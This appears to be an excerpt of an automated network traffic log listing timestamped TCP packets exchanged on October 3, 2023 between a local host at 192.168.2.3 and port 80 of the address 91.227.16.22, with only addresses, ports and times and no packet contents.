                                                                                                        Oct 3, 2023 18:02:39.543278933 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.543329954 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.543370962 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.543375015 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.543411016 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.543431044 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.543451071 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.543456078 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.543494940 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.543917894 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544037104 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544050932 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544066906 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544083118 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544111967 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544121027 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544488907 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544502020 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544513941 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544538975 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544547081 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544559956 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544567108 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544610023 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544636011 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544692993 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544709921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544725895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544738054 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544766903 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544836044 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544855118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544895887 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544898033 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.544913054 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544931889 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.544958115 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.545039892 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545047045 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.545058966 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545077085 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545085907 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.545120955 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.545140028 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545180082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545222998 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.545453072 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545490980 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545533895 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.545535088 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545556068 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.545598030 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.545613050 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546004057 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.546005011 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546036959 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546050072 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546051025 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.546092987 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.546093941 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546119928 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546133995 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546164036 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.546197891 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546230078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546243906 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.546910048 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546927929 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546943903 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546948910 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.546948910 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.546964884 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.546983957 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547003031 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547003984 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547018051 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547027111 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547038078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547071934 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547085047 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547097921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547127962 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547154903 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547168970 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547203064 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547205925 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547233105 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547259092 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547302008 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547316074 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547346115 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547514915 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547554016 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547560930 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547574997 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547591925 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547617912 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547655106 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547698975 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547874928 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547931910 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547938108 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547971964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.547986984 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.547996044 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548038006 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548055887 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548444033 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548491955 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548496962 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548520088 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548563957 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548569918 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548593044 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548634052 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548667908 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548681021 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548691988 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548722029 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548742056 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548774004 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548787117 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548815966 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548834085 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548858881 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548897982 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548928022 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548939943 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.548950911 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548988104 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.548995018 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549014091 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549055099 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549060106 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549081087 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549099922 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549123049 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549154997 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549187899 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549196959 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549209118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549249887 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549258947 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549288034 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549329042 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549331903 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549369097 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549391031 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549408913 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549418926 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549447060 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549449921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549483061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549504042 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549529076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549561024 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549573898 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549606085 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549645901 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549675941 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549689054 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549721003 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549734116 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549765110 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549770117 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549789906 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549813986 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549822092 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549839973 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549868107 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549887896 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549904108 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549904108 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549928904 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549930096 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549943924 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549974918 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.549985886 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.549998999 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550018072 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550040960 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550085068 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550100088 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550128937 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550163031 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550175905 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550205946 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550246954 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550267935 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550290108 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550291061 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550307989 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550326109 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550333023 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550338984 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550369024 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550400972 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550443888 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550451040 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550466061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550504923 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550518036 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550533056 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550549030 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550566912 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550575018 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550586939 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550611973 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550615072 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550652027 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550659895 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550668955 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550709009 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550717115 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550740957 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550753117 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550770998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550781965 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550789118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550802946 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550812960 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550849915 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550854921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550869942 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550898075 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.550924063 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550955057 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.550991058 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551016092 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551028013 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551049948 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551058054 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551069975 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551088095 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551099062 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551136017 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551141024 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551177979 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551208973 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551222086 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551250935 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551279068 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551290989 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551295996 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551330090 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551332951 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551352024 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551363945 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551389933 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551394939 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551426888 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551431894 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551472902 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551491022 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551513910 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551631927 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551650047 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551666975 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551678896 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551683903 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551697016 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551708937 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551708937 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551733017 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551740885 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551753998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551764965 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551781893 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551783085 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551809072 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551850080 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551862955 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551892042 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551922083 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551938057 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.551964998 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.551997900 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552026033 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552040100 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552082062 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552126884 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552158117 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552237034 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552282095 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552316904 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552398920 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552440882 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552457094 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552500963 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552541018 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552542925 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552625895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552669048 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552706003 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552753925 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552797079 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552803993 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552860022 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552892923 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552900076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552933931 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.552973986 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.552979946 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553045034 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553056002 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553087950 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.553092003 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553128958 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553133965 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.553170919 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553212881 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.553217888 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553237915 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553251982 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553277016 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.553333044 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553349972 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553361893 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.553375006 CEST4982880192.168.2.391.227.16.22
